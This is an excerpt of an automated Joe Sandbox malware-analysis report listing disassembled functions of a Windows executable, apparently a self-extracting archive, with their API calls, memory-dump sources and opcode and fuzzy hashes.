                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 1429681911-3916222277
                                                                                                            • Opcode ID: cd4d900704566879d98567fef9490b84dabecf6da6ee5515843d63439d086197
                                                                                                            • Instruction ID: 9c0a694ff2664dabb4899108d5b1d431a0696f03feba17b3247d89ee5b867dd8
                                                                                                            • Opcode Fuzzy Hash: cd4d900704566879d98567fef9490b84dabecf6da6ee5515843d63439d086197
                                                                                                            • Instruction Fuzzy Hash: D8314D35608741A6EB04EF12B99862AB7B2FB89FD1F804075EE4E53B14CE7ED449DB00
                                                                                                            Function 00007FF7390D8100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentVariable
                                                                                                            • String ID: sfxcmd$sfxpar
                                                                                                            • API String ID: 1431749950-3493335439
                                                                                                            • Opcode ID: 5ebb72a5e8a982ab6f35979a03fa1a1c747914a60e3bcfbf351a0b4a04fadc7d
                                                                                                            • Instruction ID: 680c40b1d43639bd2487f99febbd65483e1661a17b0e5aa542dcc447082de61d
                                                                                                            • Opcode Fuzzy Hash: 5ebb72a5e8a982ab6f35979a03fa1a1c747914a60e3bcfbf351a0b4a04fadc7d
                                                                                                            • Instruction Fuzzy Hash: AF016792F09643A1FE50BF15E8553B5E3B6AF48B80FC40035DC5D4A396EE1CE545E630
                                                                                                            Function 00007FF7390D4018 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDeviceRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 127614599-3916222277
                                                                                                            • Opcode ID: 08c9cc4778649fc248d699c7c113e2a8962370d80cad9209c0b425acb05ef843
                                                                                                            • Instruction ID: dcc54ea70b43b59f38bc9b3ffcabddead8b1c1617d8fcf3911550849cecbf479
                                                                                                            • Opcode Fuzzy Hash: 08c9cc4778649fc248d699c7c113e2a8962370d80cad9209c0b425acb05ef843
                                                                                                            • Instruction Fuzzy Hash: 35E0C220B0864196EF087BBAB6C913AA272AB4CBD0F554034EA0B43784CD7EC4814700
                                                                                                            Function 00007FF7390C3468 Relevance: 6.1, APIs: 4, Instructions: 128filetimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Create$CloseHandleTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 2287278272-0
                                                                                                            • Opcode ID: 4894cbe2d1322a083068b8c1208fc3582a0c48e5b89e355b71fab84c4c6941cd
                                                                                                            • Instruction ID: f94886ef98d0b643bdc303f3ba608a60d87ff1397f7adf266bd8e1b0868ed432
                                                                                                            • Opcode Fuzzy Hash: 4894cbe2d1322a083068b8c1208fc3582a0c48e5b89e355b71fab84c4c6941cd
                                                                                                            • Instruction Fuzzy Hash: 8941F622B1D64362EA50AF21A49137AE7B2BF857A4F904231ED9D0A7D4DF3CD5099B10
                                                                                                            Function 00007FF7390E4A80 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 4141327611-0
                                                                                                            • Opcode ID: d880fa9f94960c43d76edc7d46fd7fd12f48158bb94f03d2dbeef91405623373
                                                                                                            • Instruction ID: efb753d3024cd7749073e4f7bf9730026393df3a1424c8b2a77431d09c2086f2
                                                                                                            • Opcode Fuzzy Hash: d880fa9f94960c43d76edc7d46fd7fd12f48158bb94f03d2dbeef91405623373
                                                                                                            • Instruction Fuzzy Hash: 70419536E0CA4BA6FB65AF159080379F6B3EF80B90F944130DA5D47AD9DF2CE8419720
                                                                                                            Function 00007FF7390D49C8 Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1077098981-0
                                                                                                            • Opcode ID: 14ec988683278f3c1d07234fe04ffe00701ce1aab34cc43294cd82d1b463aeaf
                                                                                                            • Instruction ID: a8e2224022733c7a497cdc7ada12777a542978797c4e571a22dd9694f37a64a8
                                                                                                            • Opcode Fuzzy Hash: 14ec988683278f3c1d07234fe04ffe00701ce1aab34cc43294cd82d1b463aeaf
                                                                                                            • Instruction Fuzzy Hash: FA418233A18B83A6EB409F61E4443AAF7B6FB84794F900035EA4E67A58DF3CD545DB10
                                                                                                            Function 00007FF7390E7C98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7390E3527), ref: 00007FF7390E7CB1
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7390E3527), ref: 00007FF7390E7D13
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7390E3527), ref: 00007FF7390E7D4D
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7390E3527), ref: 00007FF7390E7D77
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1557788787-0
                                                                                                            • Opcode ID: aa18238654882386b9d0897c17b51a5f9ed15ce0d8f5fb224eeb48b167aa83ff
                                                                                                            • Instruction ID: 209326675427ff8786b05a8489377f66407013db437bc4b60aebcc73839d211d
                                                                                                            • Opcode Fuzzy Hash: aa18238654882386b9d0897c17b51a5f9ed15ce0d8f5fb224eeb48b167aa83ff
                                                                                                            • Instruction Fuzzy Hash: 3E216431E18F5A91E624AF16A400039F6B6FB54FD0B884135DE9E67BA8DF3CE4529710
                                                                                                            Function 00007FF7390E4540 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7390DEEF8,?,?,00000050,00007FF7390E0F39), ref: 00007FF7390E454A
                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7390DEEF8,?,?,00000050,00007FF7390E0F39), ref: 00007FF7390E45B2
                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7390DEEF8,?,?,00000050,00007FF7390E0F39), ref: 00007FF7390E45C8
                                                                                                            • abort.LIBCMT ref: 00007FF7390E45CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 1447195878-0
                                                                                                            • Opcode ID: 88bfaefee3b16969abcd629beb7c88dd00db0ae15200f3768ec5c5f7affd9ef2
                                                                                                            • Instruction ID: 3e8fc105bff3d09b1b04aea857b3c469747b87624b95b55267c6891ef2daed20
                                                                                                            • Opcode Fuzzy Hash: 88bfaefee3b16969abcd629beb7c88dd00db0ae15200f3768ec5c5f7affd9ef2
                                                                                                            • Instruction Fuzzy Hash: FC016925E09E0B62FA58BF21A659138F2B35F44780F940938D91E42BC7ED2CE9816230
                                                                                                            Function 00007FF7390D3FC8 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Release
                                                                                                            • String ID:
                                                                                                            • API String ID: 1035833867-0
                                                                                                            • Opcode ID: de3163929738922bdc4373ac15e40e607844013dd20d7cdd13a9d9fdb8090fde
                                                                                                            • Instruction ID: d1c0ee2388a407268f5fcdfece6d8472924c99799e077caf60e33e1538f35f1c
                                                                                                            • Opcode Fuzzy Hash: de3163929738922bdc4373ac15e40e607844013dd20d7cdd13a9d9fdb8090fde
                                                                                                            • Instruction Fuzzy Hash: 57E01260E09702A2EF087F71B859135A272BF48741F844579C81F56390DD7EE4455720
                                                                                                            Function 00007FF7390E5118 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: e+000$gfff
                                                                                                            • API String ID: 3215553584-3030954782
                                                                                                            • Opcode ID: ba747b6ce185f137c8bd639e097530e05e7cded08133b748bf2a946e8a959c91
                                                                                                            • Instruction ID: 0e6b2a70854d3a18f2ab18eb37128496d80cf98ecc4a0245c14e1a2c10ddf53c
                                                                                                            • Opcode Fuzzy Hash: ba747b6ce185f137c8bd639e097530e05e7cded08133b748bf2a946e8a959c91
                                                                                                            • Instruction Fuzzy Hash: 23514A62F18BC756EB249F759841369BBA2EB81B90F888635C79C47BD6CF2CE040D710
                                                                                                            Function 00007FF7390C44C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7390C30E6,?,?,?,?,?,?,?,00007FF7390C207A), ref: 00007FF7390C45BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory
                                                                                                            • String ID: UNC$\\?\
                                                                                                            • API String ID: 1611563598-253988292
                                                                                                            • Opcode ID: a27231365f8fb5718fbddbdcd3b2f43621bf9e33d47d239f75a3384afd0627a5
                                                                                                            • Instruction ID: 284986ff6d7fc0ce351cc256c2c3827ad647269c8f2b941b29e760ab12d0d9a8
                                                                                                            • Opcode Fuzzy Hash: a27231365f8fb5718fbddbdcd3b2f43621bf9e33d47d239f75a3384afd0627a5
                                                                                                            • Instruction Fuzzy Hash: 5C419452E0864764EA20BF21D5401B9F2F6BF45FC8FC04031ED8E0B69ADF6CE545AA25
                                                                                                            Function 00007FF7390E338C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                            • String ID: C:\Users\user\Desktop\file.exe
                                                                                                            • API String ID: 3307058713-4010620828
                                                                                                            • Opcode ID: 9ed515fc78dd58fad28d3394be3f9a7140abdf15cb57f65dadee2c7878335ab5
                                                                                                            • Instruction ID: 223bb3709fb5d56f81d59f34eef694fb294198bae8fb762802036d69f081aacc
                                                                                                            • Opcode Fuzzy Hash: 9ed515fc78dd58fad28d3394be3f9a7140abdf15cb57f65dadee2c7878335ab5
                                                                                                            • Instruction Fuzzy Hash: 1F418176E08E5BA6EB15EF36A4400B8BBB6FF44B84B845035EA0D47785DE3DE441A320
                                                                                                            Function 00007FF7390C5054 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_snwprintf
                                                                                                            • String ID: $%s$@%s
                                                                                                            • API String ID: 2650857296-834177443
                                                                                                            • Opcode ID: 9cb053ce51d3e54c912a2f88310482384077601e29e7d2ce5379a8bbdb268548
                                                                                                            • Instruction ID: c73d9e0ad01f22ded1703a1d193f485c18ed637ba7d3ef475764bf9a62c6ae43
                                                                                                            • Opcode Fuzzy Hash: 9cb053ce51d3e54c912a2f88310482384077601e29e7d2ce5379a8bbdb268548
                                                                                                            • Instruction Fuzzy Hash: B631D332A0DA47A5EA20AF95E4403BDA372FB41784FD00032EE8D0B755DE3DD505EB50
                                                                                                            Function 00007FF7390E5BC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleType
                                                                                                            • String ID: @
                                                                                                            • API String ID: 3000768030-2766056989
                                                                                                            • Opcode ID: eaffe4eb5df80335ba97f392b40983d446b8a8f082df8f811c505cbb500cc913
                                                                                                            • Instruction ID: 5159eaa5bbf1cd4e4d060ce063f6ca95800074b45f39eb9aa1d1aaae5b2b13ce
                                                                                                            • Opcode Fuzzy Hash: eaffe4eb5df80335ba97f392b40983d446b8a8f082df8f811c505cbb500cc913
                                                                                                            • Instruction Fuzzy Hash: 4821B122E08F4B54EF60DF6494A0138A772EB95774FA81735D66E177D4CE39E881E320
                                                                                                            Function 00007FF7390DB514 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7390D970A), ref: 00007FF7390DB558
                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7390D970A), ref: 00007FF7390DB59E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                            • Opcode ID: b3fd3407c9776497406ed41f83dc65dc5bd5048803f83b97085b94b965162c8b
                                                                                                            • Instruction ID: 0a09f83c34af4552ffcd4d9585df0b3dcc853217157b85e49eca70c4a90ad6d6
                                                                                                            • Opcode Fuzzy Hash: b3fd3407c9776497406ed41f83dc65dc5bd5048803f83b97085b94b965162c8b
                                                                                                            • Instruction Fuzzy Hash: AC113A32A18B8692EB219F15F440269B7B2FB88B94F584234EE8D07B68DF3CD5519B00
                                                                                                            Function 00007FF7390CADC8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
